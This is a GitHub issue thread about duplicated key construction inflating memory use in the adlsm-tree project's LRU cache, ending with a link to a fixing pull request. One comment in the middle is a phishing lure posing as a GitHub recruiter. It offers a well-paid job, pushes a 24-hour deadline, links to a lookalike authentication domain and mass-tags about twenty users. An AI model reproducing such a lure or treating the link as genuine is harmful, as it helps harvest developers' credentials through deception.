### ISSUE TITLE
lrucache memory usage is high

### ISSUE THREAD

**Issue by fansehep** [adlternative/adlsm-tree#2]
from the code, we can see the lrucache key is construct twice.
so have any plan to optimze it?

**Comment by adlternative** [comment]
maybe use string pointer? I have no time to maintenance this project, but any pull requests are welcome!

**Comment by fansehep** [comment]
> maybe use string pointer? I have no time to maintenance this project, but any pull requests are welcome!

yep, if use std::string* can solve the problem, but the ```map``` container chooise should be careful. I have no time to optimize it. Maybe one day, i will? 😢

**Comment by yannvr** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Pent, @mymggithub, @Anonymous-N, @chromaphase75, @lbarbaglia, @qbit890, @play166, @lukecav, @Conggo2014, @Miracles-sun, @weaklifeform, @silent-waiting, @afghl, @xinzhangseu, @huytq085, @myramnath, @shangwei5, @lamatehu, @feichaoyu, @dongdongbh

**Comment by webbrain-one** [comment]
Hi! Thanks for flagging this. I've opened a PR to address the issue: https://github.com/adlternative/adlsm-tree/pull/4. It removes the duplicate LRU cache key construction that was happening twice, which should help reduce the unnecessary memory overhead. Let me know your thoughts!
